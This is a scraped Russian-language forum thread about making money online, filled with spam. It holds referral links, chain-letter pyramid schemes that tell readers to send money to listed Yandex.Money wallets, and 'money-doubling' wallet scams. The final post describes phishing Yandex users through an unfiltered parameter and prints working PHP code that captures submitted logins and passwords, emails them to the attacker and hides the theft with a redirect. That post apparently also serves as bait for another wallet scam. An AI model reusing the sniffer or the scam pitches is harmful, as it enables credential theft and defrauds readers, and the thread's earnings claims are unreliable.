6.Щелкаете по кнопке внизу ' Click to submit ...' Переместились на
страницу, на которой Вам сообщают, что на Ваш баланс
зачислено 6$. Щелкаете по ссылке ' Click Here to go Home and ...' И
так дальше по оставшимся ссылкам.
Теперь у вас есть свой баланс. А дальше привлекаете новых уже своих
клиентов. Т.е. даёте такое же объявление, что и я
(можете немного изменить) на разные сайты о работе, только в ссылке
после = пишите не calve2009, а свой логин. И поверьте, вместо 30$ будет
больше в день около 100,$ Чем больше объявлений, тем больше денег.
Для вывода денег воспользуйтесь кнопкой 'Redeem Money'. Минимум для вывода 75$.
УДАЧИ ВСЕМ!!!
Всё работает ПРОВЕРЕННО!!!!!!!

 
ElenochkaДата: Суббота, 16.04.2011, 19:36 | Сообщение # 7
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
сейчас в интернете существует множество обманок к интернет кошельками и прочей фигней. я же предлагаю 2 эффективных способа заработка в интернете!1)вы можете заказать курс обучения -как создать свой собственный бизнес!http://elenochka.freeforex.ecommtools.com 2)стать моим партнером совершенно бесплатно!!http://elenochka.freeforex.ecommtools.com/part give_heart.gif это не обман, это правда)))просто попробуйте))я тоже не верила))просто для интереса попробовала и вуаля))за месяц 1000 долларов))
 
isaul77Дата: Вторник, 05.07.2011, 18:14 | Сообщение # 8
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Пригласи человека (реферала) и получи 5 руб.
Доброго всем времяни суток, Хочу Вам предложить способ заработка!
Способ не автоматический, никаких регистраций, все довольно просто.
Вы оплачиваете по 5 рублей на два кошелька- это (10 рублей. Оплата учитывается без процентов WM и проводется через WebMoney Keeper. ) и получаете
персанальную ссылку на свою страничку, по которой вы приглашаете людей
и за каждого вы получаете 5 рублей непосредственно на свой кошелек.
Для того чтобы, было все честно, при оплате в строке примечания Вы вписываете
свой WMR кошелек и электронный адрес (e-mail) на который Вам придет ссылка
на вашу персональную страничку.Приглашайте людей и получайте по 5 рублей за
каждого. http://bizisaulnet.ks8.ru/

Добавлено (05.07.2011, 18:14)
---------------------------------------------
Самый легкий способ заработать в интернете, работает, проверено! Я не знаю, какой я по счёту участник проекта, но у меня получается, за 2 месяца вышло около 48 т.р., так что если вы целеустремлённый человек, пробуйте и у вас получится! Дочитайте до конца данную статью, уделите всего несколько минут, ВЫ НИЧЕГО НЕ ПОТЕРЯЕТЕ, чтение еще никому не повредило! Я Вас уверяю, ваше материальное положение резко улучшится, ЕСЛИ ТОЛЬКО ВЫ ЭТОГО ЗАХОТИТЕ!!! Наш проект направлен на развитие системы Яндекс. Деньги! Если у Вас есть желание заработать, не вкладывая много денег (к примеру, другие Интернет - проекты требуют вложений до 900$) и работая всего по несколько часов в день, то эта информация для Вас. Но для этого потребуется хорошо поработать около недели по нескольку часов в день. Вы можете зарабатывать в зависимости от ваших усилий. Я не предлагаю Вам работу "наборщика текста" (из серии "вышлите нам столько-то рублей на кошелек, а мы вам пришлем отсканированные тексты") и не предлагаю вкладывать деньги в сомнительные предприятия - вот это настоящий обман! Люди хотят работать в уютной обстановке дома - вот почему они откликаются на подобные объявления. Самое печальное заключается в том, что они и в самом деле ГОТОВЫ РАБОТАТЬ, но работу им никогда не предоставляют, так как подобных "работодателей" волнует лишь пополнение их личного счета. ЗАПОМНИТЕ: НЕ существует настоящих вакансий "наборщика текста" и "сотрудников по обработке электронной почты". Не будьте обманутыми! В настоящем случае Вы не будете жертвой недобросовестных "работодателей", так как эта работа отнюдь не мифическая, а заработок зависит только от Ваших усилий. Это - действительно РЕАЛЬНЫЙ заработок в Интернете. Я предлагаю Вам вещь, к которой и сам относился поначалу скептически. Но в отличие от многих подобных предложений – ЭТО ДЕЙСТВИТЕЛЬНО РАБОТАЕТ. Понимаю, с каким недоверием Вы это читаете - но продолжайте, прошу, дочитайте статью до конца. ЧИТАЯ ЭТО, ВЫ МОЖЕТЕ ИЗМЕНИТЬ СВОЮ ЖИЗНЬ, как это изменило мою!!! Наткнулся я на ЭТО совершенно случайно, когда искал работу для дополнительного заработка, найдя статью, в которой говорилось, что МОЖНО СДЕЛАТЬ СОТНИ ТЫСЯЧ РУБЛЕЙ ЗА ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 70 РУБ. Я подумал, что это должно быть очередной фишкой для лохов, но решил всё-таки дочитать до конца и узнать, что там предлагают… Дальше там говорилось, что надо послать по 10 рублей на 7 Internet-кошельков, которые ниже перечислены. Потом вычеркнуть первый кошелёк из списка, тем самым, сместив список на одну строчку вверх. В результате чего седьмая строчка освобождается, куда Вы вписываете номер своего Internet-кошелька. Затем Вы закидываете данное сообщение, но уже с ВАШИМИ ДАН¬НЫМИ на седьмой строчке, на 200 разных форумов - НИКАКИХ УЛОВОК !!! Ну, я поразмышлял и подумал, что в принципе НИЧЕГО НЕ ТЕРЯЮ кроме 70 руб. ЗАТО У МЕНЯ ПОЯВЛЯЕТСЯ ШАНС ЗАРАБОТАТЬ. И этот шанс СТОИТ ЭТОЙ НЕБОЛЬШОЙ СУММЫ. И я решил попробовать.…Установил Интернет-кошелёк, перечислил всем участникам акции по 10 руб и начал рассылать эти объявления по разным форумам и доскам объявлений. В течение 4-х дней я зарегистрировался на более чем на 100 бизнес-форумах и бесплатных досках объявлений. Прошла неделя, заглядываю в свой Интернет кошелек, и угадайте ЧТО!!!! Поступлений никаких нет, вообще !!! А разные участники пишут, что за неделю заработали кто по 750 руб, кто по 450 руб… Пиши пропало, подумал я, попал в очередной лохотрон, желая заработать за пару недель десятки тысяч рублей. Ну и бросил это занятие, так и не дослав свое объявление до 200 форумов. Ещё через неделю (ради любопытства) заглянул в свой Интернет кошелек. Смотрю, всего одно поступление - 10 руб. Да, думаю, дело не стоящее, случайно нашёлся такой же наивный, как и я. Ещё через две недели я все-таки снова открыл свой Интернет кошелек, а в нем уже около 900 руб. Откуда? Непонятная картина, но всё равно за 1 месяц 900 руб. Это очень мало, как пишут предыдущие участники – они за 1 месяц заработали десятки тысяч рублей. И вдруг после 1 месяца началось самое интересное: на мой кошелёк стали приходить деньги КАЖДЫЙ ДЕНЬ, спустя ещё 2 недели на моем счету уже было более 48 000 руб. После этого я отправил свои объявления ещё более чем на 150 форумов. РЕЗУЛЬТАТ БЫЛ ОЩЕЛОМЛЯЮЩИЙ. По прошествии всего 2 месяцев, я получил 141 000 руб. И деньги идут каждый день. Каждые 10 минут на мой счёт поступает по 10-30 руб. И это все только за цену в 70 руб!!! Я был в очень плохом экономическом положении и долго не мог найти себе подходящую работу до того, как наткнулся на эту статью. Я не поверил, что это работает, пока не начал получать переводы со всего света… Я купил всё, что мне надо… И это очень кстати, согласитесь!?... Моя работа теперь - это каждый день по 2-3 часа в Интернете и ВСЁ!!!! А заработок такой, что никаким начальникам и руководителям даже и не снился!!! Теперь, я расскажу Вам, как это работает, и самое главное ПОЧЕМУ…! Я Вам обещаю, что если вы будете В ТОЧНОСТИ соблюдать ниже перечисленные инструкции, то вы начнете получать НАМНОГО БОЛЬШЕ ДЕНЕГ, чем Вы думали, не прилагая к этому особых усилий. Согласитесь, это просто!!! И ЭТО СОВЕРШЕННО ЛЕГАЛЬНО. И ВАШ ВКЛАД СОСТАВЛЯЕТ ВСЕГО 70 РУБЛЕЙ... ВАЖНО ЭТО НЕ ОБМАН И ПРИ ЭТОМ ВЫ НИЧЕМ НЕ РИСКУЕТЕ, НО ЭТО РАБОТАЕТ!!! ВНИМАНИЕ!!! ПРОЧТИТЕ ЭТО НЕСКОЛЬКО РАЗ! Следуйте инструкциям в ТОЧНОСТИ и 150 000 руб. И БОЛЬШЕ будут Вашими в течение двух месяцев!!! ВОТ ТЕ САМЫЕ 3 ШАГА К УСПЕХУ 1. Зарегистрируйтесь в системе YANDEX MONEY, которая находится по адресу http//money.yandex.ru, хорошенько ознакомьтесь с данной системой, как она работает, выберите оптимальный для себя вариант пополнения кошелька и внесите 70 рублей на свой кошелёк. Сразу возникнет проблема внесения денег на счет, скорее всего, придется прогуляться в ближайший банк, или терминал для оплаты сотовой связи (адреса можно найти на http//money.yandex.ru), но поверьте один раз стоит сходить для последующего реального заработка! Вообще все на сайте расписано и понятно. 2. Возьмите первый номер кошелька из нижеуказанного списка, отправьте на него 10 руб 05 коп, вписав этот номер в поле «Номер счёта».В поля «Имя получателя» и «E-mail получателя» вписывать ничего не нужно. В поле «Название платежа» напишите – «Пожалуйста, внесите меня в список Яndex кошельков». Все, что Вы сделали - это создали услугу, и самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ сервис, за который платите. Далее, начиная со второго, по аналогии отправьте по 10 руб. 05 коп. на следующие 6 кошельков (не забудьте вписывать в поле «Название платежа» Пожалуйста, внесите меня в список Яndex кошельков)
1. 41001440165295
2. 41001346970687
3. 41001346971232
4. 41001440163186
5. 41001567451907
6. 41001470373697
7. 41001567461887
ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА КАЖДЫЙ из этих 7 кошельков по 10 руб. 05 коп. иначе, сетевыми модераторами Яndex кошельков, вы просто не будете включены в систему и не сможете обналичить доход. Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ 2, скопируйте к себе на компьютер весь этот текст от начала до конца (можно в формате txt или ещё как вам удобней). В скопированной статье удалите из списка кошельков ПЕРВЫЙ (ВЕРХНИЙ) кошелёк и переместите 2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го и 7-ой - на место 6-го ! А в 7-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР Вашего КОШЕЛЬКА!!! В случае возникновения проблем с Яндекс кошельком советую обращаться НА ЭТУ страничку http//feedback.yandex.ru/?from = money. Соответственно у Вас должно получиться так: 1. 41001295458028 2. .41001346970687 3. 41001346971232 4. 41001346971544 5.41001567451907 6. 41001644135522 7. Номер вашего кошелька 3. Разместите эту статью (или объявление с ссылкой на страницу, которую вы без труда можете сделать на одном из бесплатных сайтов, например, http//www.narod.ru) на НЕ МЕНЕЕ ЧЕМ 200-300 ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups). ЗАПОМНИТЕ ЧЕМ БОЛЬШЕ вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД. И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС. Размещение этой статьи на 200 форумах, даже на самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб. - ЭТО МИНИМУМ!!! в течение двух месяцев!!! БОЛЬШЕ РАЗМЕЩЕНИЙ – БОЛЬШЕ ДОХОД (при том в ГЕОМЕТРИЧЕСКОЙ ПРОГРЕССИИ). ИТАК, КОГДА ВЫ ДОСТИГНЕТЕ ПЕРВОЙ ПОЗИЦИИ В СПИСКЕ, ВЫ БУДЕТЕ ИМЕТЬ ТЫСЯЧИ РУБЛЕЙ ПРОСТО КАК СОЗДАТЕЛЬ СПИСКА !!!!!!! ЭТО СТОИТ 70-ти рублей и СОВСЕМ НЕ ТРУДНОЙ РАБОТЫ! ГЛАВНОЕ – ЭТО РАБОТАЕТ!!! И ЭТО ПРОСТО ЗДОРОВО!!! Займитесь этим сейчас - не откладывая на завтра….!!! ВРЕМЯ - ДЕНЬГИ!!! Но поработать всё же придется. Необходимо заинтересовать людей. Для этого необходимо воспользоваться рассылкой, размещением объявлений на специализированных сайтах о поисках работы, форумах, досках объявлений. Удачи Вам! Она уже действительно рядом! Действуйте! Плохо живут те, которые всю жизнь лишь собираются жить! ДАВАЙТЕ РИСКНЕМ!! ВЕДЬ НИЧЕГО, КРОМЕ 70 РУБЛЕЙ НЕ ТЕРЯЕМ!!

 
ИрбисДата: Суббота, 23.07.2011, 21:45 | Сообщение # 9
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Немного но реально http://fiftrys.com/?ref=2877111
 
GrossarДата: Воскресенье, 24.07.2011, 18:32 | Сообщение # 10
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
http://fiftrys.com/?ref=2879494
супер вещь в месяц от 800р я ей инет плачу )))
 
СвояДата: Среда, 27.07.2011, 17:13 | Сообщение # 11
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
КАК ОБМАНУТЬ ЛОХОТРОНЩИКОВ И ЗАРАБОТАТЬ 15000 РУБЛЕЙ. Я расскажу вам: 1.
Как наглые лохотронщики обманывают людей на сумму в размере 5000
рублей (Яндекс-Деньги ), а некоторых на еще большие суммы. 2. Как обмануть
лохотронщиков и заработать 15000 рублей (Яндекс-Деньги ) Тема 1. История «
Как я лохонула их и получаю стабильно 15000 рублей » Нашла я в сети где-то
статью приблизительно такого содержания: «Есть в системе Яндекс-Деньги
волшебный кошелек, и все что вы на него пошлете вернется вам в утроенном
размере!!! Любая сумма от 100 рублей и выше! Пошлете десять тысяч получите
тридцать тысяч и т.д.». Конечно, всем понятно, лохотрон, но если
порыть глубже… Я не поверила, но для теста послала 100 рублей. Через где-то
час проверила свой Яндекс кошелек и обнаружила перевод в 300 рублей! Я
удивилась. Послала потом еще 100 рублей опять то же самое. Потом послал 300
рублей, мне пришло 900. Осмелев окончательно послала все что у меня было –
около 5000 рублей ... Что было дальше, думаю, вы уже поняли. Никаких 15000
рублей мне никто не прислал, да и мои 5000 тоже исчезли
навсегда... Понятно как они работают. У них на сервере стоит хитрая
программка, которая принимает суммы от 100 рублей и примерно до 800 рублей
(закидывала им 900 рублей и их забрали, а 800 закинула программа вернула
2400 рублей) Вот и заколачивают тысячи! В общем, это я к тому, что если
быть аккуратным и выслать, небольшую сумму (они принимают любые суммы, но
не меньше 100 рублей), то всегда можно получать в три раза больше. У них
есть специальная программа, которая смотрит кто сколько переводов сделал и
на какую сумму, чтобы определить когда нужно кидануть. Переводы суммой до
800 рублей они не забирают никогда. То есть, послав 800 рублей вы в любом
случае получите 2400 рублей, т.к. сумма мелкая и они будут ждать пока вы
пришлете больше. Если аккуратно слать им небольшие суммы то можно их
обманывать. Они уже не смотрят на переводы сами, за них это делает
специальный софт (программа ), что упрощает вероятность их обмана. Я
сейчас зарабатываю на этом около 15000 рублей в неделю (можно делать
и больше ). Это не миллионы, но это более-менее стабильный доход. Денег на
этих кошельках сотни тысяч, и меня очень раздражает как они кидают людей,
по этому надо их разорить. Вот сам кошелек: 410011065948022
 
IgrokДата: Пятница, 29.07.2011, 22:44 | Сообщение # 12
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
На этом сайте всё о заработке подробно описано! Сайт только развивается: kakzarabotat.3dn.ru
 
aleks007Дата: Пятница, 19.08.2011, 17:59 | Сообщение # 13
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
biggrin !!!!!!!ЛЮДИ!!!!!!!!ПРЕДСТАВЛЯЮ ВАШЕМУ ВНИМАНИЮ САМЫЙ "БЫСТРЫЙ ЯНДЕКС БОТ КОШЕЛЁК" 41001914003334 ДЕНЬГИ ПРИХОДЯТ ПОЧТИ МОМЕНТАЛЬНО ЧЕРЕЗ 5-10 МИНУТ!!!!!!Я ОЧЕНЬ МНОГО ЛАЗИЛ В ИНТЕРНЕТЕ НО С ТАКИМ Я СТОЛКНУЛСЯ В ПЕРВЫЙ РАЗ В ЖИЗНИ!!!!!!СУММА ОТОСЛАННАЯ ПРИХОДИТ В 2 РАЗА БОЛЬШЕ ТОЕСТЬ ОТОСЛАЛ 50 РУБЛЕЙ ПРИШЛО 100 ВСЁ ПРОСТО!!!ЕСЛИ КОНЕЧНО ЖЕ ВЫ НЕ ВЕРИТЕ МОЖЕТЕ ОТОСЛАТЬ К ПРИМЕРУ 5-10 ЯНДЕКС ДЕНЕГ И УВЕРЯЮ ВАС ВЫ НЕ БУДИТЕ ОГОРЧЕНЫ ДЕНЬГИ ПРИДУТ ПОЧТИ СРАЗУ-ЖЕ ЭТО НАСТОЯЩИЙ КЛАНДАЙК за день я заработал на новенький мобильник ПРЕДСТАВЛЯЕТЕ ЧТО МОЖНО ЗАРАБОТАТЬ ЗА НЕДЕЛЮ!!!!!!))))))) surprised

Добавлено (19.08.2011, 17:59)
---------------------------------------------
biggrin !!!!!!!ЛЮДИ!!!!!!!!ПРЕДСТАВЛЯЮ ВАШЕМУ ВНИМАНИЮ САМЫЙ "БЫСТРЫЙ ЯНДЕКС БОТ КОШЕЛЁК" 41001914003334 ДЕНЬГИ ПРИХОДЯТ ПОЧТИ МОМЕНТАЛЬНО ЧЕРЕЗ 5-10 МИНУТ!!!!!!Я ОЧЕНЬ МНОГО ЛАЗИЛ В ИНТЕРНЕТЕ НО С ТАКИМ Я СТОЛКНУЛСЯ В ПЕРВЫЙ РАЗ В ЖИЗНИ!!!!!!СУММА ОТОСЛАННАЯ ПРИХОДИТ В 2 РАЗА БОЛЬШЕ ТОЕСТЬ ОТОСЛАЛ 50 РУБЛЕЙ ПРИШЛО 100 ВСЁ ПРОСТО!!!ЕСЛИ КОНЕЧНО ЖЕ ВЫ НЕ ВЕРИТЕ МОЖЕТЕ ОТОСЛАТЬ К ПРИМЕРУ 5-10 ЯНДЕКС ДЕНЕГ И УВЕРЯЮ ВАС ВЫ НЕ БУДИТЕ ОГОРЧЕНЫ ДЕНЬГИ ПРИДУТ ПОЧТИ СРАЗУ-ЖЕ ЭТО НАСТОЯЩИЙ КЛАНДАЙК за день я заработал на новенький мобильник ПРЕДСТАВЛЯЕТЕ ЧТО МОЖНО ЗАРАБОТАТЬ ЗА НЕДЕЛЮ!!!!!!))))))) surprised wink

 
VipMaxNikДата: Суббота, 27.08.2011, 19:36 | Сообщение # 14
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
SB-money

http://sb-money.ru/?user=277448

Хороший сайт для интернет-серфинга.Минималка для вывода 0.01$.Но за 1 только бонус Вы получите от 0.02 до 0.5$.Поверьте мне, там не 1 бонус сайт.За день можно пройти около 10 сайтов.(Зависит от вашей активноости).Также работает плата за чтение писем,просмотр сайтов,клики.
 
RitulikДата: Понедельник, 29.08.2011, 07:30 | Сообщение # 15
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Только не ведись на лохотрон! Лучше попробуй себя в написании статей , общайся на форумах и получай честнозаработанные деньги . Зайди сюда http://advego.ru/3FhFjeDbks или сюда http://pro100zarabotat.ucoz.ru/ там разберёшся. Удачи!!
 
zikДата: Суббота, 03.09.2011, 18:15 | Сообщение # 16
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Классный сайт для авто сёрфинга http://richcow.net/?r=X52E17WVR0.Проста скачиваете программу,устанавливаете и деньги сами идут на счёт при условии что компьютер включин.
Обейсню как это работает:
Все мы есть на сайте www.vkontakte.ru и все мы видили сбоку рекламу всякую разную.Ну вот рекламодатель выкладывает на сайте ссылку и каждый раз когда по ней ктото кликает сайту перечесляется какаето сумма денег.Ну вот сайт Richcow.net
дают программу которая сама переходит по таким ссылкам,ну и разумеется дают вам долю.
Ну есть ньюанс чтоб зарегится на сайте вы должны стать рефералом (ну тойсть в сайт приходят только по приглашению)
Вот мой реферал

http://richcow.net/?r=X52E17WVR0

просто переходите по ссылке и всё!
 
___SharP___Дата: Четверг, 20.10.2011, 17:03 | Сообщение # 17
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Как заработать на кошельках Яндекс-деньги
То, что Вы читаете – не реклама и не
надувательство - с теми или иными погрешностями
, проект реален и, как ни странно, работает. Наткнулся я на ЭТО совершенно
случайно, когда искал работу для дополнительного
заработка, найдя статью, в которой говорилось,
что МОЖНО СДЕЛАТЬ БОЛЕЕ ДЕСЯТИ ТЫСЯЧ РУБЛЕЙ ЗА
ПАРУ НЕДЕЛЬ ПРИ ВЛОЖЕНИИ ВСЕГО 60 РУБ.ЭТО
СОВЕРШЕННО ЛЕГАЛЬНО. И ВАШ ВКЛАД СОСТАВЛЯЕТ ВСЕГО 60 РУБЛЕЙ...
ВАЖНО: ЭТО НЕ ОБМАН И ПРИ ЭТОМ ВЫ НИЧЕМ НЕ РИСКУЕТЕ,
НО ЭТО РАБОТАЕТ!!! ВНИМАНИЕ!!! ПРОЧТИТЕ ЭТО НЕСКОЛЬКО Раз!
Следуйте инструкциям в ТОЧНОСТИ.
И БОЛЬШЕ будут Вашими в течение двух месяцев!!!
ВОТ ТЕ САМЫЕ 3 ШАГА К УСПЕХУ:
1. Зарегистрируйтесь с системе YANDEX MONEY, которая
находится по адресу http://money.yandex.ru, хорошенько
ознакомьтесь с данной системой как она работает,
выберите оптимальный для себя вариант пополнения кошелька
и внесите 60 рублей на свой кошелёк. Если вы находитесь
в Украине, то создаете свой КОШЕЛЕК с помощью Интернет.
Деньги Украинской версии на http://www.imoney.com.ua/download/index.ru.htm.Там
создаете 2 счета: первый – в гривнах, второй – в
российских рублях (так делал мой друг). Затем пополняете
свой счет в грн. - см.
http://imoney.com.ua/shops/exch.ru.htm , и с помощью
обменников на http://imoney.com.ua/shops/exch.ru.htm
переправляете эти деньги на свой «рублевый» счет.
Если вы находитесь в ЛЮБОЙ ДРУГОЙ ЦИВИЛИЗОВАННОЙ СТРАНЕ,
то создайте КОШЕЛЕК WebMoney на http://www.webmoney.ru,
с помощью которого вы легко сможете обменять свои честно
заработанные рубли на доллары или евро в любом
обменнике (например, здесь http://obmendeneg.com).
Сразу возникнет проблема внесения денег на счет,
скорее всего, придется прогуляться в ближайший банк,
или терминал для оплаты сотовой связи
(адреса можно найти на http://money.yandex.ru), но
поверьте один раз стоит сходить для последующего
реального заработка! Вообще все на сайте расписано и понятно.
2. Возьмите первый номер кошелька из нижеуказанного
списка, отправьте на него 10 руб, вписав этот номер в поле «Номер счёта».
В поля «Имя получателя» и «E-mail получателя»
вписывать ничего не нужно.
В поле «Контракт/назначение платежа» напишите
– «Пожалуйста, внесите меня в список Яndex кошельков».
Все, что Вы сделали - это создали услугу, и
самое главное - абсолютно легально. Вы просите ЗАКОННЫЙ
сервис, за который платите. Далее, начиная со второго,
по аналогии отправьте по 10 руб. на следующие 5
кошельков (не забудьте вписывать в поле «Контракт/назначение
платежа» «Пожалуйста, внесите меня в список Яndex кошельков»):
1) 41001297248567
2) 41001297354413
3) 41001299172898
4) 41001299104715
5) 41001301284183
6) 410011139442546
ПОВТОРЯЮ, чтобы получать доход, необходимо отправить НА
КАЖДЫЙ из этих 6 кошельков по 10 руб. - иначе, сетевыми
модераторами Яndex кошельков, вы просто не будете включены
в систему и не сможете обналичить доход.
Теперь ВНИМАНИЕ!!! После того, как Вы выполнили ШАГ 2,
скопируйте к себе на компьютер весь этот текст от начала
до конца (можно в формате txt или ещё как вам удобней).
В скопированной статье удалите из списка кошельков ПЕРВЫЙ
(ВЕРХНИЙ) кошелёк и переместите
2-ой кошелёк на место 1-го, который Вы стёрли, 3-ий - на
место 2-го, 4-ый - на место 3-го, 5-ый - на место 4-го, 6-ой - на место 5-го!
А в 6-ой номер, который оказался пустым, ВПИШИТЕ НОМЕР
Вашего КОШЕЛЬКА!!!
3. Разместите эту статью (или объявление с ссылкой на
страницу, которую вы без труда можете сделать на
одном из бесплатных сайтов, например,
http://www.narod.ru) на НЕ МЕНЕЕ ЧЕМ 200-300
ФОРУМАХ и НОВОСТНЫХ ЛЕНТАХ (News Groups).
ЗАПОМНИТЕ: ЧЕМ БОЛЬШЕ вы разместите, ТЕМ ВЫШЕ БУДЕТ ВАШ ДОХОД.
И этот доход будет НАПРЯМУЮ ЗАВИСЕТЬ ОТ ВАС.
Размещение этой статьи на 200 форумах, даже на
самых малопосещаемых, ГАРАНТИРУЕТ Вам доход 150 000 руб.
- ЭТО МИНИМУМ!!!, в течение двух месяцев!!!
БОЛЬШЕ РАЗМЕЩЕНИЙ – БОЛЬШЕ ДОХОД!

Добавлено (20.10.2011, 17:03)
---------------------------------------------
Хотите заработать на серфинге рекламы?
Это можно сделать с помощью сайта указанного ниже.

http://fropee.com/?ref=1216742

В день можно просмотреть 3 рекламных ролика.
За каждый из них платят по 14 рублей.
Для этого нужно всего лишь ответить на вопросы анкеты.
А для большего заработка привлекать рефералов.

 
deinmenДата: Воскресенье, 23.10.2011, 12:25 | Сообщение # 18
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
инструкцыя по тому как ЗАРАБОТАТЬ думаю сами поймете почему в таком виде и еще одно не ведитесь на подобный ЛОХОТРОН там все есть
http://letitbit.net/download/78823.7510f7cc905f1657d687d7f70772/Документ_Microsoft_Word_(2).doc.html
 
madamaДата: Вторник, 25.10.2011, 19:52 | Сообщение # 19
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Дополнительный заработок без вложения собственных средств ! Американская компания 20 долларов платит всего лишь за рeгиcтрaцию.Гарантированно 10 $ в день! (Вы должны зарегистрироваться на 4 сайтах, чтобы увеличить свой доход) . Нужно каждый день авторизироваться на каждом из этих сайтов и каждый день вам будет начисляться заработок.Также вы будете получать 1 $ за каждого реферала +25% от их заработка.

http://exactmoney.ru/?ref=KyRjiNwCbf

http://exactgold.ru/?ref=NzzYLw5289

http://exactraw.ru/?ref=HbIGFcM8KL
7
http://exactstock.ru/?ref=yzYMDXHv1A

Спокойствие только Спокойствие, просто кликая можете заработать в месяц небольше 300$,а привлекая рефералов (люди которые придут на ваш сайт по вашей ссылке,она есть на всех сайтах) заработаете в 10 раз больше
 
diman-1984Дата: Четверг, 08.12.2011, 18:32 | Сообщение # 20
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
ХОЧЕШЬ ЗАРОБАТЫВАТЬ ДЕНЬГИ НЕ ВЫХОДЯ ИЗ ДОМА??? Реальный зароботок в инете по этой ссылке http://fiftryss.com/?ref=3426020 Регистрируйся и ЗАРОБАТЫВАЙ ОТ 1000-5000руб. в день
 
ben-ladenДата: Четверг, 15.12.2011, 19:30 | Сообщение # 21
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Вот сайт отличный
http://fropee.com/?ref=1266049
проста региструруйся и отвечай на вопросы за это получаешь мани
регистрация возможно ток через яндекс + создайте там свой кошелёк
и введите свой номер кошелька в регистрацию
всё)
 
Master555Дата: Среда, 11.01.2012, 10:20 | Сообщение # 22
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Не знаю кто на чем, а я работаю с игровыми партнерками, вот одна http://actionpay.ru/?ref=4961 вот другая https://www.admitad.com/ru/webmaster/registration/?ref=59e74305cf в день от 300р. до 4500р. можно и больше если грамотно привлечь трафик, у меня один реф разогнался так что в день от 5т.р. поднимает аж самому завидно! могу предоставить все принскрины выплат и еще что будет нужно! если интересно пишите на golovenkov79@mail.ru
 
RonnyДата: Четверг, 12.01.2012, 05:30 | Сообщение # 23
Рядовой
Группа: Пользователи
Сообщений: 1
Репутация: 0
Статус: Offline
Привет всем. Сейчас я расскажу, как я нашел баг в яндекс деньгах. ПРОШУ ДОЧИТАТЬ ЭТОТ ПОСТ ДО КОНЦА.
«Как Все начиналось»
Два часа ночи, я был готов пойти спать, но надо было проверить почту. Зайдя к себе на мыльник (зарегистрирован я на яндекс.ру), я увидел огромное кол-во спама. Долбаный антиспам, установленный на yandex.ru, работает дерьмово, видимо спам - подарок от яндекс .ру. Что ж, как никак Новый Год скоро, надо тоже сделать подарок любимому почтовику))
Исследовав почтовый сервис я так ничего и не нашел. Что же, поищем через гугль. Так как у яндекса есть много других сервисов помимо почтового, в строке запроса я написал: site:*yandex.ru. В ответ гугль вывалил 214 000 000 страниц урлов (к счастью половина была повторных, иначе я бы лежал в психушке ). Я налил себе кофе и начал проверять сервисы. Web-кодеры yandex.ru хорошо поработали, так как после 2-х часового аудита не было найдено ни одной уязвимости. На данный момент были учтены некоторые глюки сервиса 7ya.yandex.ru, при просмотре картинок выскакивало popup окно, запомнив адрес: Я очень удивился и обрадовался, потому что выскочило окошко, которое означало одно - target никак не фильтруется. Было решено создать фэйк страницу авторизации, чтобы был баг и робот яндекса присылал мне пароль от яндекс карты. Было уже 5 часов утра, даже после 5 кружек кофе хотелось спать (а еще больше хотелось в туалет ). Поэтому я попросил своего хорошего знакомого pixcher'a продолжить начатое мною дело. На следующий день (т.е. на этот же ) на аську пришла мессага от pixcher'a. Он создал фэйк форму, а также составил ядовитый урл:
на нашу фэйк форму'</script>
В таком виде этот урл сильно палился, поэтому мы немного замаскировали его, чтобы админы яндекса чувствовали себя сухо и комфортно . Далее был написан небольшой сниффер, который принимал переданные значения, записывал их в файл и перекидывал пороль карты на мыло , вот код сниффера:
<?
$adminmail = "mymail@yandex ru";
function email($to,$mailtext) {
mail($to,'password',$mailtext,$adminmail);
}
$text="[".date("d.m.y H:i")."]Login: $_POST[login] Password: $_POST[pass]\r\n";
email($adminmail,$text);
$file = fopen("logs.txt","a");
flock($file,3);
fputs($file, $text);
flock($file,1);
fclose($file);
echo "<FORM id='auth' action='http://talk.mail.ru/login.html' method=post>
<INPUT type=hidden name=login value='$_POST[login]'>
<INPUT type=hidden name=pass value='$_POST[pass]'>
<script>auth.submit();</script>
</FORM>";
?>
Создание фэйка - это совсем не сложно, сохраняем пагу к себе на винт и редактируем параметр action тега form. В итоге данные, которые ввел юзер, запишутся к тебе в файл и произойдет редирект, удивленный админ решит, что произошли какие-нить сбои в работе службы DNS. После этого мы создали баг к кошельку
Для проверки проделанной работы мы кинули 150 руб на этот номер кошелька 41001493134589
